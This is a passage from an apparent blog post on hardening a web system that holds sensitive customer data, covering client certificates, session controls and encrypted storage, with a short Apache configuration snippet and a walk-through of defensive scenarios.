  • Keep the CA root certificate in a secure place!! Nobody must be able to get it, or else your whole certificate system will be compromised.
  • Set up the web server vhost to require a client certificate (How can I force clients to authenticate using certificates? from http://httpd.apache.org/docs/2.2/ssl/ssl_howto.html). This way, right after somebody opens up the login page, you would already know what client (employee) certificate they are using.
  • The client certificates must be protected with a password; this improves security - in order to log in, you must first unlock your client certificate with its password, then open the login page and provide your own user/pass pair.
  • Consider using Turing-test based login forms, e.g. http://community.citrix.com/display/ocb/2009/07/01/Easy+Mutli-Factor+Authentication . This will protect the passwords against keyboard sniffing.
  • The web server must
    • match each user/pass to their corresponding certificate;
    • have an easy mechanism for certificate revocation (disabling), in case you decide to part ways with an employee.
  • Once logged in, create a standard PHP session and code as usual.
  • The most critical operations (which are also infrequent) should be approved only after the user re-enters their password; this prevents replay attacks. For example, if you want to view a full credit card number (and you don't usually need this), the system will first ask you to re-enter your password before showing the information. Banks usually use this kind of protection for every online transaction.
  • Expire sessions regularly - in a few hours or less of inactivity.
  • If possible, tie every session to its source IP address; that is - log the IP address upon login and don't allow other IP addresses to use this session ID. Note: some providers like AOL (used to) have transparent load-balancing proxies, behind which the IP address of a single client may change over time; you cannot use this security method if you have such clients (test before enforcing it).
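
Requiring client certificates in Apache, per the ssl_howto document referenced above, comes down to a few mod_ssl directives - the CA file path here is an assumption:

```apache
SSLVerifyClient require
SSLVerifyDepth  1
SSLCACertificateFile /etc/ssl/ca/company-ca.crt
```

With this in place, a visitor without a certificate signed by your CA never even reaches the login page.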

A system like this should be protected against most attacks. Here are a couple of scenarios:

  • Brute-force attacks at the login page - they will not succeed because a user/pass + client certificate are required. Actually, without a certificate, the login page will not be displayed at all.
  • Someone steals a user laptop - they cannot use the certificate (even if they know the user/pass pair), because they don't know its password.
  • Someone sees a user entering their passwords - the passwords are useless without the corresponding client certificate.
  • An employee starts to harvest the customer data - you have a rate limit of requests per employee, and also a general rate limit of requests to your database - you get an alert and investigate this further manually (you have full logs on the server).
  • Someone hacks into your server and quickly copies the database + PHP scripts onto a remote machine - they cannot use the data, because it is encrypted and you never stored the key in a file on the server - you enter the key every time manually upon server start-up.
  • Someone initiates a man-in-the-middle attack and sniffs your traffic - you are using only HTTPS and never click through SSL warnings in your browser - you are safe, the traffic cannot be read by third parties.
  • Someone gets total control over a user computer (installs a key logger and copies your files) - you are doomed, nothing can help you, unless the compromise is noticed quickly.
  • Someone really good hacks your server and spends a few days learning your system - if the intrusion detection system and the custom monitoring scripts didn't catch them, and they spent days on your server trying to break it, then you are in real trouble. This scenario has a very low probability; really skilled hackers are rarely tempted to do bad things.

The integration of such a secure database system can be easy. For example, if you have a customer named XYZ, you can assign a unique number to this customer in your CRM system, then use the secure storage to save sensitive data about this customer, referring to them by that unique number. It is true that your employees will have to work with one more interface - the interface of the secure database system - but this is the price of security: you have to sacrifice some convenience for it.


Careful implementation of all of the above measures will further increase the security of the system, making the server extremely resilient against cyber attacks. Remember though, security is not a state - it's a process. Hire someone to take care of all security-related tasks on an ongoing basis.

Another point - as great as this all sounds on paper, it's the implementation that counts. Be careful with the implementation of the different services, safeguards and applications.

The weakest point in such a system would be the employee computer. A hacker who knows the basic layout of the server (and it follows the recommendations given so far) would focus on attacking the computer of some employee. Do not ignore the client side of the equation - this is quite often the weakest link in the chain.

We have plans to write a post about the client side too.